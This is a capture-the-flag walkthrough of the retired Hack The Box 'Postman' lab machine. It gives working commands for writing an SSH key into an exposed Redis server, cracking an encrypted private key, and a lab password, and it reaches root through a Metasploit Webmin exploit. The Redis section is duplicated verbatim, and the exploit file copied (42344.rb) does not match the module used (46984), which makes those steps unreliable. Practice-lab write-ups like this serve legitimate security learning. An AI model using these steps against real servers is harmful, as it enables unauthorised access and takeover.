Hack The Box - Postman server
Postman is retired (14.3.2020) Linux server on the HackTheBox penetration testing lab. It was marked with Easy difficulty, which makes it an ideal candidate for beginners to start with. I am going to try to write the entire walkthrough as detailed as possible, so it is clear to everyone what is being done and why.
We will use/learn: nmap, redis exploitation, webmin exploitation, ssh key cracking, login via SSH by using the RSA private key, metasploit framework
We will use/learn: nmap, redis exploitation, webmin exploitation, ssh key cracking, login via SSH by using the RSA private key, metasploit framework
Getting User:
Let's start with basic enumeration of the ports & services running on the server with nmap (Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Source).
For those not familiar with the command I suggest to check this cheat-sheet first: nmap-cheat-sheet.
The scan found port 22 (ssh), port 80 (http), port 6379 (redis) and port 10000 (Webmin).
For SSH we do not have any credentials, the webpage on port 80 revealed nothing, let's check the Redis service. Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker. It supports data structures such as strings, hashes, lists, sets, sorted sets with range queries, bitmaps, hyperloglogs, geospatial indexes with radius queries and streams. (Source).
One of the first hits on google is Rapid7's hacking guide for Metasploit (redis_unauth_exec), but let's ignore it for the moment and try to hack in manually. There is a pretty good guide on hacking the Redis service in Kali Linux - An Ethical Hackers Cookbook 2nd Edition book (btw you can download it in the PDF format) :
So let's follow the procedure further. After checking, if the telnet is running on port 6379, we run the following:
Create the RSA key:
ssh-keygen -t rsa -C pk@pk.pk
Enter the file where we want to save it (in my case /root/Downloads/HTB/postman.htb/postman_rsa)
Install the Redis CLI. Use the following command to do so:
sudo apt-get install redis-tools
Go back to the generated public key and add some random data before and after the key:
(echo -e "\n\n"; cat postman_rsa.pub; echo -e "\n\n") > ./redis.txt
Now redis.txt is our new key file with new lines.
Flush the keys using the following command:
redis-cli -h 10.10.10.160 -p 6379 flushall
Set our keys into the database using the following command:
cat redis.txt | redis-cli -h 10.10.10.160 -p 6379 -x set bb
Copy the uploaded key into the ssh folder; check the current folder with the following command
redis-cli -h 10.10.10.160 -p 6379
And then run:
config get dir (you will get output for user “redis” : /var/lib/redis/.ssh)
Change our directory to /var/lib/redis/.ssh
config set dir /var/lib/redis/.ssh
Change the name of our set dbfilename "authorized_keys" file and save the change:
config set dbfilename “authorized_keys”
save
For SSH we do not have any credentials, the webpage on port 80 revealed nothing, let's check the Redis service. Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker. It supports data structures such as strings, hashes, lists, sets, sorted sets with range queries, bitmaps, hyperloglogs, geospatial indexes with radius queries and streams. (Source).
One of the first hits on google is Rapid7's hacking guide for Metasploit (redis_unauth_exec), but let's ignore it for the moment and try to hack in manually. There is a pretty good guide on hacking the Redis service in Kali Linux - An Ethical Hackers Cookbook 2nd Edition book (btw you can download it in the PDF format) :
Create the RSA key:
ssh-keygen -t rsa -C pk@pk.pk
Enter the file where we want to save it (in my case /root/Downloads/HTB/postman.htb/postman_rsa)
Install the Redis CLI. Use the following command to do so:
sudo apt-get install redis-tools
Go back to the generated public key and add some random data before and after the key:
(echo -e "\n\n"; cat postman_rsa.pub; echo -e "\n\n") > ./redis.txt
Now redis.txt is our new key file with new lines.
Flush the keys using the following command:
redis-cli -h 10.10.10.160 -p 6379 flushall
Set our keys into the database using the following command:
cat redis.txt | redis-cli -h 10.10.10.160 -p 6379 -x set bb
Copy the uploaded key into the ssh folder; check the current folder with the following command
redis-cli -h 10.10.10.160 -p 6379
And then run:
config get dir (you will get output for user “redis” : /var/lib/redis/.ssh)
Change our directory to /var/lib/redis/.ssh
config set dir /var/lib/redis/.ssh
Change the name of our set dbfilename "authorized_keys" file and save the change:
config set dbfilename “authorized_keys”
save
So now, when we uploaded our public RSA key to the server, we should be able to connect via SSH by using the private key as user redis:
So now, when we are connected as user Redis, we can check what is running on the server, what other users are configured there and how we could exploit the server further. The great tool for such thing is LinEnum.sh script (Download here), which I run on all Linux servers. In 9 out of 10 cases it helps you to find a way in (either by identifying the files with SUID, processes running with sudo rights etc.). But that is not necessary on Postman server.
The quick check of /opt directory reveals a backup of a private RSA key. We also check what users are configured on the server in /home directory:
So I think it is safe to assume that the backup RSA key belongs to user Matt. But as you can see, it is encrypted, so we need to decrypt it first. So we download it and google how to decrypt RSA key with John The Ripper or Hashcat. I found this article to be extremely helpful: SSH_tricks
These 5 lines tell us exactly what we need to do. So after downloading the sshng2john python script, we can decrypt the file and get the password.
However, when we try to login via ssh, the connection is closed immediately. Even when we try to use the private key, the connection shuts down. So let's try simply to switch users from Redis to Matt:
And that works! So we are logged in as Matt, so we can grab the User's flag in user.txt file:
Getting Root:
The initial enumeration with nmap showed us that port 10000 is opened and it is running a Webmin. Webmin is a web-based system configuration tool for Unix-like systems, although recent versions can also be installed and run on Windows (Wikipedia).
So let's try to check the Webmin app in the browser. http://postman:10000 shows us custom error message:
So let's do what we were told and try the SSL (https):
And we get the Login screen to Webmin. Because we have Matt's credentials (Matt/computer2008), let's try them in here:
And we can see that the Webmin version is 1.910. Now let's take a shortcut and use Metasploit (I am going to add the manual hack later)...
At first let's check for available hacks in the Metasploit framework: searchsploit 1.910
And it finds us a remote command execution ruby script. It is just a standalone exploit script, we need to import it to Metasploit database first:
As first we have to create the MSF webapps exploit directory :
mkdir -p /root/.msf4/modules/exploits/cgi/webapps/
and copy the exploit there:
cp /usr/share/exploitdb/exploits/cgi/webapps/42344.rb /root/.msf4/modules/exploits/cgi/webapps/
Then we have to run updatedb command to get the Metasploit database updated with this exploit. Once all that is done, we can start the Metasploit framework and try to hack in:
msfconsole
msf5 > use exploit/cgi/webapps/46984
and get the necessary information we need to insert in order to execute the attack:
And we can see that we are going to modify remote hosts, username, password, localhost, SSL is set to false (and from our first login we know that the server requires SSL authentication) so we are going to set it to "true".
And we have our remote session as root, so we can grab the root's flag from /root/root.txt file. or we can create a new user with root permissions and login via SSH etc.
Did not really learn anything new by cracking this box, but it was certainly fun.
Comments
Post a Comment